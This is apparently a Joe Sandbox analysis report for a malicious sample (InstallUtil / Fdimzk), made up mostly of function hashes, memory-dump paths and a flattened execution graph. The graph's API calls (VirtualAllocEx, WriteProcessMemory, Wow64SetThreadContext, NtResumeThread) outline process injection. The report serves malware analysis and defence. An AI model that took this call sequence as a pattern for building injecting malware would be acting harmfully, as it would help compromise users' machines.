                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2ef2f313a126ec723122a2c0227d50ade7c2d1e2aa839c6a627957f3e2633af7
                                        • Instruction ID: 641073e43a2fdbf65628283ae8f16d8c9fd4c458da66b8b698226fc16d40b774
                                        • Opcode Fuzzy Hash: 2ef2f313a126ec723122a2c0227d50ade7c2d1e2aa839c6a627957f3e2633af7
                                        • Instruction Fuzzy Hash: B521D0B5D01259AFCB00DF9AD984ADEFBB4FB48710F10852AE918B7740D374A954CFA4
                                        Function 05C73960 Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 10caadb9afd9cb533a8f08df6d6c032f6bbd6e77d6b59bc9082862256ebc04fe
                                        • Instruction ID: 578bbf00cdb76074358dc8f3413e5b9e2b7d3662c548bf100cc1c7a4521d4108
                                        • Opcode Fuzzy Hash: 10caadb9afd9cb533a8f08df6d6c032f6bbd6e77d6b59bc9082862256ebc04fe
                                        • Instruction Fuzzy Hash: 2011D0B1D01259AFCB00DF9AD885ADEFBF8FB48710F10852AE918A7340C375A954CFA5
                                        Function 05C7EE8F Relevance: .1, Instructions: 52COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 87418b294c0b63aea4e6cb68e4371e6b46eee989c4fac93f0b263a6e315eef98
                                        • Instruction ID: f85bb6d79de5db049e857a035ef7a18d02ddfb9ccf41e8d3875fa2324fb1d4e6
                                        • Opcode Fuzzy Hash: 87418b294c0b63aea4e6cb68e4371e6b46eee989c4fac93f0b263a6e315eef98
                                        • Instruction Fuzzy Hash: 3101F2327005184BEB21957C9890F3E23DBEBC8720F144C6AF00ACB780EE24EC024351
                                        Function 05C73EE8 Relevance: .1, Instructions: 51COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0c4b97125ff9a5b52a3ed866f0e941a7988be0b39de3162369e5fa2bec8b364e
                                        • Instruction ID: 0ed5ca862a88c0f80069433e500e70af864c5dad03e8eb223073fd98bfae53ea
                                        • Opcode Fuzzy Hash: 0c4b97125ff9a5b52a3ed866f0e941a7988be0b39de3162369e5fa2bec8b364e
                                        • Instruction Fuzzy Hash: 2301D1357001144BDB24A56D9491F2BA6EBEBC9F20F208C7AF00ACB741DE61ED4243E1
                                        Function 05C73C93 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 99e5780df7ae8c7e78a200d31a284b4f7a94956e20012ea85d4a0aa43f5ccad0
                                        • Instruction ID: f230e50cd0120face398e1d79553b5ba4556c25a4fb16e1d57140c03d895bbd5
                                        • Opcode Fuzzy Hash: 99e5780df7ae8c7e78a200d31a284b4f7a94956e20012ea85d4a0aa43f5ccad0
                                        • Instruction Fuzzy Hash: 9901DF32B040194BDB449A6CCC106BB7AABEBC8B10F18493ADA0AE7740EF24C90257E1
                                        Function 05C7A3F3 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d6ce17f74ef74765b4fe7eb4fa33bec2ac3657f9965938d8dd7f9edd7101fdb
                                        • Instruction ID: 3f58ea5c5beffc211f7a7f4011f9135ef7d24a76cf2c3fcd419ca0ed73f04829
                                        • Opcode Fuzzy Hash: 8d6ce17f74ef74765b4fe7eb4fa33bec2ac3657f9965938d8dd7f9edd7101fdb
                                        • Instruction Fuzzy Hash: 7A01A2717001180BDB24A67CE899F2EB7EAFB89710F144839E50ACB745EE12ED018791
                                        Function 05C7EEA0 Relevance: .0, Instructions: 49COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e09523a8fbed7b09902b98ee8649fd88d8eb212b97ce53b63cdcad2e95c0b1b0
                                        • Instruction ID: 4ea449aaf2b7ac6e11ababf46216ca41a1a1b0cc05a7c743a030bbfec31c72bb
                                        • Opcode Fuzzy Hash: e09523a8fbed7b09902b98ee8649fd88d8eb212b97ce53b63cdcad2e95c0b1b0
                                        • Instruction Fuzzy Hash: 1A018C327005194BEB24A67C9894F3F66EBEBC9B20F148C69F50ACB740EE65ED024395
                                        Function 05C7A400 Relevance: .0, Instructions: 46COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3230750ce7341532ef8c245460b8c19c2aed30be8e8ab8877e5ed95cec2bb492
                                        • Instruction ID: 6336cf380446a099c45860090f8c2f64c9b3e1e5d6c8df678b47449a7d915e98
                                        • Opcode Fuzzy Hash: 3230750ce7341532ef8c245460b8c19c2aed30be8e8ab8877e5ed95cec2bb492
                                        • Instruction Fuzzy Hash: 620181307001180BDB24A66CE894F2F77DAFB89710F109839E50ACB744EE22ED014791
                                        Function 05C7C8C7 Relevance: .0, Instructions: 34COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 06badb349468fcd52ffde88d7439655dbd6995c4f345e6f403c2edc1a8747095
                                        • Instruction ID: 369dc657d626ce82c09d243224ca632b50ab4fd6507edb4f8428ff24cbb0ec66
                                        • Opcode Fuzzy Hash: 06badb349468fcd52ffde88d7439655dbd6995c4f345e6f403c2edc1a8747095
                                        • Instruction Fuzzy Hash: FAF08276E212289BDF149965E841BEA733AF748325F104825E902E7644E7319D01CBC0
                                        Function 05C74729 Relevance: .0, Instructions: 25COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f05ca32d82c5ed3760dbb7b6bc6a9f9e5a9512009fac7eb3915f4c63e5be04ae
                                        • Instruction ID: 53679e6830d523689eed89c06ebe958038859281352d328308bbc8546db78d8f
                                        • Opcode Fuzzy Hash: f05ca32d82c5ed3760dbb7b6bc6a9f9e5a9512009fac7eb3915f4c63e5be04ae
                                        • Instruction Fuzzy Hash: 0EF0FE34E20119DFDF18DF94E899BADBBB6FF44715F200519E002A7694CBB41D41CB81
                                        Function 05C76563 Relevance: .0, Instructions: 23COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2027712459.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_5c70000_InstallUtil.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 31ed562fb363685c6b299cbf2860fe8203786d4bb60a88531cc22d6b9483e3e0
                                        • Instruction ID: 639f27b1031636464a7b9b687bb955f685dfe26adcd09cf31ebcf63c28a2310f
                                        • Opcode Fuzzy Hash: 31ed562fb363685c6b299cbf2860fe8203786d4bb60a88531cc22d6b9483e3e0
                                        • Instruction Fuzzy Hash: 18E08671E0010D6BDF10CE71C945B6A72AEE701314F204CA4D408C7600E272DA415780

                                        Execution Graph

                                        Execution Coverage:14.3%
                                        Dynamic/Decrypted Code Coverage:98.3%
                                        Signature Coverage:0%
                                        Total number of Nodes:402
                                        Total number of Limit Nodes:21
                                        execution_graph 52347 a0b900 52348 a0b91a 52347->52348 52349 a0b92a 52348->52349 52352 6912001 52348->52352 52356 6911942 52348->52356 52353 6912020 52352->52353 52360 691d630 52353->52360 52357 6911948 52356->52357 52359 691d630 VirtualProtect 52357->52359 52358 6911963 52358->52349 52359->52358 52361 691d657 52360->52361 52364 691da80 52361->52364 52365 691dac8 VirtualProtect 52364->52365 52367 6912047 52365->52367 52368 68a74aa 52369 68a74b4 52368->52369 52373 5845a28 52369->52373 52378 5845a38 52369->52378 52370 68a74f2 52374 5845a38 52373->52374 52383 5845a78 52374->52383 52388 5845a69 52374->52388 52375 5845a63 52375->52370 52379 5845a4d 52378->52379 52381 5845a78 2 API calls 52379->52381 52382 5845a69 2 API calls 52379->52382 52380 5845a63 52380->52370 52381->52380 52382->52380 52385 5845aa5 52383->52385 52384 5845b0f 52384->52375 52385->52384 52386 58434f0 VirtualProtect 52385->52386 52387 58434e8 VirtualProtect 52385->52387 52386->52385 52387->52385 52390 5845a78 52388->52390 52389 5845b0f 52389->52375 52390->52389 52391 58434f0 VirtualProtect 52390->52391 52392 58434e8 VirtualProtect 52390->52392 52391->52390 52392->52390 52406 68a6eba 52407 68a6ec0 52406->52407 52411 584d540 52407->52411 52416 584d550 52407->52416 52408 68a6ae9 52412 584d550 52411->52412 52421 584d580 52412->52421 52427 584d590 52412->52427 52413 584d57b 52413->52408 52417 584d565 52416->52417 52419 584d580 4 API calls 52417->52419 52420 584d590 4 API calls 52417->52420 52418 584d57b 52418->52408 52419->52418 52420->52418 52423 584d584 52421->52423 52422 584d7aa 52422->52413 52423->52422 52433 584db09 52423->52433 52438 5844538 52423->52438 52442 5844540 52423->52442 52428 584d592 52427->52428 52429 584d7aa 52428->52429 52430 584db09 2 API calls 52428->52430 52431 5844540 DuplicateHandle 52428->52431 52432 5844538 DuplicateHandle 52428->52432 52429->52413 52430->52428 52431->52428 52432->52428 52434 584db15 52433->52434 52436 58440a4 CreateFileA 52434->52436 52437 58440b0 CreateFileA 52434->52437 52435 584db55 52435->52423 52436->52435 52437->52435 52439 5844588 DuplicateHandle 52438->52439 52441 58445db 52439->52441 52441->52423 52443 5844588 DuplicateHandle 52442->52443 52445 58445db 52443->52445 52445->52423 52642 6901772 52643 690175d 52642->52643 52646 58428d4 52643->52646 52650 58428e0 52643->52650 52647 58428e0 CreateProcessA 52646->52647 52649 5842acc 52647->52649 52651 58428e6 CreateProcessA 52650->52651 52653 5842acc 52651->52653 52658 68a73fe 52659 68a7408 52658->52659 52663 5844d80 52659->52663 52667 5844d70 52659->52667 52660 68a7446 52664 5844d95 52663->52664 52671 5844e74 52664->52671 52668 5844d95 52667->52668 52670 5844e74 2 API calls 52668->52670 52669 5844dab 52669->52660 52670->52669 52672 5844e9d 52671->52672 52673 5844dab 52672->52673 52674 58434f0 VirtualProtect 52672->52674 52675 58434e8 VirtualProtect 52672->52675 52673->52660 52674->52672 52675->52672 52393 96d030 52394 96d048 52393->52394 52395 96d0a3 52394->52395 52397 691e0e8 52394->52397 52398 691e110 52397->52398 52401 691e5a8 52398->52401 52399 691e137 52402 691e5d5 52401->52402 52403 691d630 VirtualProtect 52402->52403 52405 691e76b 52402->52405 52404 691e75c 52403->52404 52404->52399 52405->52399 52446 68a70bd 52447 68a70c7 52446->52447 52451 584ddc8 52447->52451 52455 584ddd8 52447->52455 52448 68a7105 52452 584ddcc 52451->52452 52453 584de03 52452->52453 52459 584e129 52452->52459 52453->52448 52456 584ddda 52455->52456 52457 584de03 52456->52457 52458 584e129 8 API calls 52456->52458 52457->52448 52458->52457 52460 584e133 52459->52460 52464 584f188 52460->52464 52476 584f178 52460->52476 52461 584de75 52461->52453 52465 584f19d 52464->52465 52488 584f664 52465->52488 52492 584f258 52465->52492 52496 584f2d8 52465->52496 52500 584f1d8 52465->52500 52504 584f36c 52465->52504 52508 584f5fc 52465->52508 52512 584f3e3 52465->52512 52516 584f341 52465->52516 52520 584f1c7 52465->52520 52466 584f1bf 52466->52461 52477 584f17c 52476->52477 52479 584f664 8 API calls 52477->52479 52480 584f1c7 8 API calls 52477->52480 52481 584f341 8 API calls 52477->52481 52482 584f3e3 8 API calls 52477->52482 52483 584f5fc 8 API calls 52477->52483 52484 584f36c 8 API calls 52477->52484 52485 584f1d8 8 API calls 52477->52485 52486 584f2d8 8 API calls 52477->52486 52487 584f258 8 API calls 52477->52487 52478 584f1bf 52478->52461 52479->52478 52480->52478 52481->52478 52482->52478 52483->52478 52484->52478 52485->52478 52486->52478 52487->52478 52490 584f23d 52488->52490 52489 584f363 52489->52466 52490->52489 52524 584f8a3 52490->52524 52494 584f23d 52492->52494 52493 584f363 52493->52466 52494->52493 52495 584f8a3 8 API calls 52494->52495 52495->52494 52498 584f23d 52496->52498 52497 584f363 52497->52466 52498->52497 52499 584f8a3 8 API calls 52498->52499 52499->52498 52501 584f205 52500->52501 52502 584f363 52501->52502 52503 584f8a3 8 API calls 52501->52503 52502->52466 52503->52501 52506 584f23d 52504->52506 52505 584f363 52505->52466 52506->52505 52507 584f8a3 8 API calls 52506->52507 52507->52506 52510 584f23d 52508->52510 52509 584f363 52509->52466 52510->52509 52511 584f8a3 8 API calls 52510->52511 52511->52510 52514 584f23d 52512->52514 52513 584f363 52513->52466 52514->52513 52515 584f8a3 8 API calls 52514->52515 52515->52514 52518 584f23d 52516->52518 52517 584f363 52517->52466 52518->52517 52519 584f8a3 8 API calls 52518->52519 52519->52518 52522 584f1d4 52520->52522 52521 584f363 52521->52466 52522->52521 52523 584f8a3 8 API calls 52522->52523 52523->52522 52525 584f8aa 52524->52525 52527 584f8e7 52525->52527 52536 6900662 52525->52536 52540 6900c90 52525->52540 52545 69003de 52525->52545 52550 690071c 52525->52550 52555 690014a 52525->52555 52560 69008c9 52525->52560 52565 6900ba9 52525->52565 52570 69009a5 52525->52570 52575 69004e5 52525->52575 52527->52490 52580 5842be0 52536->52580 52584 5842bd8 52536->52584 52537 6900132 52541 6900ca8 52540->52541 52588 58430f8 52541->52588 52592 5843100 52541->52592 52542 6900cd5 52542->52527 52596 6902cf0 52545->52596 52601 6902cbb 52545->52601 52607 6902d00 52545->52607 52546 69003f6 52551 6900170 52550->52551 52552 6900132 52550->52552 52612 58432b0 52551->52612 52616 58432a8 52551->52616 52556 6900154 52555->52556 52558 58432b0 NtResumeThread 52556->52558 52559 58432a8 NtResumeThread 52556->52559 52557 6900132 52558->52557 52559->52557 52561 69008e6 52560->52561 52563 5843100 WriteProcessMemory 52561->52563 52564 58430f8 WriteProcessMemory 52561->52564 52562 6900926 52563->52562 52564->52562 52566 6900bc6 52565->52566 52568 5843100 WriteProcessMemory 52566->52568 52569 58430f8 WriteProcessMemory 52566->52569 52567 6900c11 52567->52527 52568->52567 52569->52567 52571 69009af 52570->52571 52620 6902d98 52571->52620 52625 6902d8b 52571->52625 52572 6900132 52576 69009cb 52575->52576 52577 6900132 52575->52577 52578 6902d98 2 API calls 52576->52578 52579 6902d8b 2 API calls 52576->52579 52578->52577 52579->52577 52581 5842c25 Wow64SetThreadContext 52580->52581 52583 5842c6d 52581->52583 52583->52537 52585 5842c25 Wow64SetThreadContext 52584->52585 52587 5842c6d 52585->52587 52587->52537 52589 5843148 WriteProcessMemory 52588->52589 52591 584319f 52589->52591 52591->52542 52593 5843148 WriteProcessMemory 52592->52593 52595 584319f 52593->52595 52595->52542 52597 6902d00 52596->52597 52599 5842be0 Wow64SetThreadContext 52597->52599 52600 5842bd8 Wow64SetThreadContext 52597->52600 52598 6902d2e 52598->52546 52599->52598 52600->52598 52602 6902cfa 52601->52602 52603 6902cc2 52601->52603 52605 5842be0 Wow64SetThreadContext 52602->52605 52606 5842bd8 Wow64SetThreadContext 52602->52606 52603->52546 52604 6902d2e 52604->52546 52605->52604 52606->52604 52608 6902d02 52607->52608 52610 5842be0 Wow64SetThreadContext 52608->52610 52611 5842bd8 Wow64SetThreadContext 52608->52611 52609 6902d2e 52609->52546 52610->52609 52611->52609 52613 58432f8 NtResumeThread 52612->52613 52615 584332d 52613->52615 52615->52552 52617 58432f8 NtResumeThread 52616->52617 52619 584332d 52617->52619 52619->52552 52621 6902dad 52620->52621 52630 5842ff8 52621->52630 52634 5843000 52621->52634 52622 6902dcf 52622->52572 52626 6902d94 52625->52626 52628 5843000 VirtualAllocEx 52626->52628 52629 5842ff8 VirtualAllocEx 52626->52629 52627 6902dcf 52627->52572 52628->52627 52629->52627 52631 5843040 VirtualAllocEx 52630->52631 52633 584307d 52631->52633 52633->52622 52635 5843040 VirtualAllocEx 52634->52635 52637 584307d 52635->52637 52637->52622 52654 691eaf8 52655 691eb38 VirtualAlloc 52654->52655 52657 691eb72 52655->52657 52638 58421b8 52639 58421be NtProtectVirtualMemory 52638->52639 52641 5842250 52639->52641 52149 68a7007 52150 68a7011 52149->52150 52154 58466e8 52150->52154 52160 58466f8 52150->52160 52151 68a6ae9 52155 584670d 52154->52155 52166 5846822 52155->52166 52170 5846738 52155->52170 52174 5846728 52155->52174 52156 5846723 52156->52151 52161 584670d 52160->52161 52163 5846822 8 API calls 52161->52163 52164 5846728 8 API calls 52161->52164 52165 5846738 8 API calls 52161->52165 52162 5846723 52162->52151 52163->52162 52164->52162 52165->52162 52167 584678d 52166->52167 52168 584688c 52167->52168 52178 5846bfb 52167->52178 52168->52156 52172 5846762 52170->52172 52171 584688c 52171->52156 52172->52171 52173 5846bfb 8 API calls 52172->52173 52173->52172 52175 5846762 52174->52175 52176 584688c 52175->52176 52177 5846bfb 8 API calls 52175->52177 52176->52156 52177->52175 52179 5846c03 52178->52179 52180 5846b85 52178->52180 52193 5846c36 52179->52193 52201 584778e 52179->52201 52205 5846d6c 52179->52205 52209 5847363 52179->52209 52213 5847262 52179->52213 52217 5847202 52179->52217 52221 5847681 52179->52221 52225 58471c1 52179->52225 52231 5847706 52179->52231 52235 5846d45 52179->52235 52239 5847024 52179->52239 52243 5846e44 52179->52243 52247 58475a4 52179->52247 52252 584789b 52179->52252 52256 584729b 52179->52256 52260 584731e 52179->52260 52266 5846cf3 52179->52266 52270 5846d93 52179->52270 52274 584706a 52179->52274 52279 5847829 52179->52279 52180->52167 52193->52167 52202 5846d4e 52201->52202 52284 58434f0 52202->52284 52288 58434e8 52202->52288 52206 5846d4e 52205->52206 52207 58434f0 VirtualProtect 52206->52207 52208 58434e8 VirtualProtect 52206->52208 52207->52206 52208->52206 52210 5846d4e 52209->52210 52211 58434f0 VirtualProtect 52210->52211 52212 58434e8 VirtualProtect 52210->52212 52211->52210 52212->52210 52214 5846d4e 52213->52214 52215 58434f0 VirtualProtect 52214->52215 52216 58434e8 VirtualProtect 52214->52216 52215->52214 52216->52214 52218 5846d4e 52217->52218 52219 58434f0 VirtualProtect 52218->52219 52220 58434e8 VirtualProtect 52218->52220 52219->52218 52220->52218 52222 5846d4e 52221->52222 52223 58434f0 VirtualProtect 52222->52223 52224 58434e8 VirtualProtect 52222->52224 52223->52222 52224->52222 52226 58471ca 52225->52226 52292 5847d6f 52226->52292 52298 5847ce8 52226->52298 52303 5847cd8 52226->52303 52227 58471e3 52232 5846d4e 52231->52232 52233 58434f0 VirtualProtect 52232->52233 52234 58434e8 VirtualProtect 52232->52234 52233->52232 52234->52232 52236 5846d4e 52235->52236 52237 58434f0 VirtualProtect 52236->52237 52238 58434e8 VirtualProtect 52236->52238 52237->52236 52238->52236 52240 5846d4e 52239->52240 52241 58434f0 VirtualProtect 52240->52241 52242 58434e8 VirtualProtect 52240->52242 52241->52240 52242->52240 52244 5846d4e 52243->52244 52245 58434f0 VirtualProtect 52244->52245 52246 58434e8 VirtualProtect 52244->52246 52245->52244 52246->52244 52248 58475af 52247->52248 52328 584426c 52248->52328 52332 5844278 52248->52332 52253 5846d4e 52252->52253 52254 58434f0 VirtualProtect 52253->52254 52255 58434e8 VirtualProtect 52253->52255 52254->52253 52255->52253 52257 5846d4e 52256->52257 52258 58434f0 VirtualProtect 52257->52258 52259 58434e8 VirtualProtect 52257->52259 52258->52257 52259->52257 52261 5847324 52260->52261 52263 5847cd8 4 API calls 52261->52263 52336 5847c48 52261->52336 52341 5847c38 52261->52341 52262 5847341 52263->52262 52267 5846d05 52266->52267 52268 58434f0 VirtualProtect 52267->52268 52269 58434e8 VirtualProtect 52267->52269 52268->52267 52269->52267 52271 5846d4e 52270->52271 52271->52270 52272 58434f0 VirtualProtect 52271->52272 52273 58434e8 VirtualProtect 52271->52273 52272->52271 52273->52271 52275 5846eb7 52274->52275 52276 5846d4e 52274->52276 52277 58434f0 VirtualProtect 52276->52277 52278 58434e8 VirtualProtect 52276->52278 52277->52276 52278->52276 52280 5847838 52279->52280 52282 58434f0 VirtualProtect 52280->52282 52283 58434e8 VirtualProtect 52280->52283 52281 5847887 52282->52281 52283->52281 52285 5843538 VirtualProtect 52284->52285 52287 5843573 52285->52287 52287->52202 52289 5843538 VirtualProtect 52288->52289 52291 5843573 52289->52291 52291->52202 52293 5847cf5 52292->52293 52294 5847d73 52292->52294 52312 5844440 52293->52312 52316 5844438 52293->52316 52294->52227 52295 5847d1f 52295->52227 52299 5847cfd 52298->52299 52301 5844440 MapViewOfFile 52299->52301 52302 5844438 MapViewOfFile 52299->52302 52300 5847d1f 52300->52227 52301->52300 52302->52300 52304 5847c5d 52303->52304 52305 5847cdb 52303->52305 52320 58440a4 52304->52320 52324 58440b0 52304->52324 52310 5844440 MapViewOfFile 52305->52310 52311 5844438 MapViewOfFile 52305->52311 52306 5847d1f 52306->52227 52310->52306 52311->52306 52313 5844480 MapViewOfFile 52312->52313 52315 58444bd 52313->52315 52315->52295 52317 5844480 MapViewOfFile 52316->52317 52319 58444bd 52317->52319 52319->52295 52321 58440b0 CreateFileA 52320->52321 52323 58441ab 52321->52323 52325 5844102 CreateFileA 52324->52325 52327 58441ab 52325->52327 52329 5844278 CreateFileMappingA 52328->52329 52331 5844371 52329->52331 52333 58442cd CreateFileMappingA 52332->52333 52335 5844371 52333->52335 52337 5847c5d 52336->52337 52339 58440a4 CreateFileA 52337->52339 52340 58440b0 CreateFileA 52337->52340 52338 5847c85 52338->52262 52339->52338 52340->52338 52342 5847c3b 52341->52342 52343 5847bbd 52341->52343 52342->52343 52345 58440a4 CreateFileA 52342->52345 52346 58440b0 CreateFileA 52342->52346 52343->52262 52344 5847c85 52344->52262 52345->52344 52346->52344

                                        Executed Functions

                                        Function 068ABF60 Relevance: 2.4, Strings: 1, Instructions: 1181COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2049144350.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_68a0000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4
                                        • API String ID: 0-4088798008
                                        • Opcode ID: a705f53fb600b4aaa8ca366698398a92663ac2f98e8dfc4847b5167a221e1d09
                                        • Instruction ID: 99368b8265a3c0623918ce7ed12ae90317e835a5d40e107cb65ae779111d1ce1
                                        • Opcode Fuzzy Hash: a705f53fb600b4aaa8ca366698398a92663ac2f98e8dfc4847b5167a221e1d09
                                        • Instruction Fuzzy Hash: ACB20874A00218DFEB54DFA8C894BADB7B6FB88700F158599EA05EB3A5DB709C41CF50
                                        Function 068AC287 Relevance: 1.7, Strings: 1, Instructions: 495COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2049144350.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_68a0000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 4
                                        • API String ID: 0-4088798008
                                        • Opcode ID: 010c6cf059ad1495e1b8c640b64a5a2678409342da186d604e1aea140e8ed41a
                                        • Instruction ID: c9c98ef4c0765016d7929b563c35b0dcf92c4ed248765b864edb6a68f067e77a
                                        • Opcode Fuzzy Hash: 010c6cf059ad1495e1b8c640b64a5a2678409342da186d604e1aea140e8ed41a
                                        • Instruction Fuzzy Hash: 5922E974A00219DFEB64DFA4C994BADB7B2FF48304F1481A9DA09EB295DB709D81CF50
                                        Function 068A7E30 Relevance: .4, Instructions: 367COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2049144350.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_68a0000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4ec179b5e699af7e23daac4c96efd428dd5eaef81adbed42bff7cce260aaf7e
                                        • Instruction ID: a951520c6693a6b680c7147e679f696a8c27bfb69363712b08a1a403849bd551
                                        • Opcode Fuzzy Hash: a4ec179b5e699af7e23daac4c96efd428dd5eaef81adbed42bff7cce260aaf7e
                                        • Instruction Fuzzy Hash: F2F1D2B4E05218CFEBA4CF69D844BADB7B2FB89300F1094A9D909E7255DB705985CF50
                                        Function 068A7E21 Relevance: .4, Instructions: 358COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2049144350.00000000068A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068A0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_68a0000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1b2145780b75c9c7b195c3a652600543295a156402d9c37603b2165a656ac957
                                        • Instruction ID: 06b3e0d7cbfca3f7cfcd26b5dd2bfd644f2ff4a9ba0f2c646f8db81c2daee8a7
                                        • Opcode Fuzzy Hash: 1b2145780b75c9c7b195c3a652600543295a156402d9c37603b2165a656ac957
                                        • Instruction Fuzzy Hash: BDF1D3B4E05218CFEBA4CF69D848BADB7B2FB89300F1095A9D909E7255DB705D85CF10
                                        Function 06B7D388 Relevance: .3, Instructions: 276COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2050422823.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6b60000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8a2ffba2049727b6f5faf0e09e82ace4dca4d0581b74988fa6361e156b257dc7
                                        • Instruction ID: a32ccfc9506b0d9915dfa3ec77b421a5c7ea924c2f9c5b0edb239e9fd2b9cfd9
                                        • Opcode Fuzzy Hash: 8a2ffba2049727b6f5faf0e09e82ace4dca4d0581b74988fa6361e156b257dc7
                                        • Instruction Fuzzy Hash: B3D1A374E00218CFDB54DFA9D994B9DBBB2FF88300F1091A9D509AB369DB31A985CF50
                                        Function 06B7EDE0 Relevance: .7, Instructions: 677COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.2050422823.0000000006B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B60000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_6b60000_Fdimzk.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c65c0600f62f4d1270edf2f01c8da743dbef849dc84b6633652e34f1f6e1293b
                                        • Instruction ID: 5ea941ffa35ca39b620caa4703150415f0e0d7c86acae114d27a92c79f545eec
                                        • Opcode Fuzzy Hash: c65c0600f62f4d1270edf2f01c8da743dbef849dc84b6633652e34f1f6e1293b
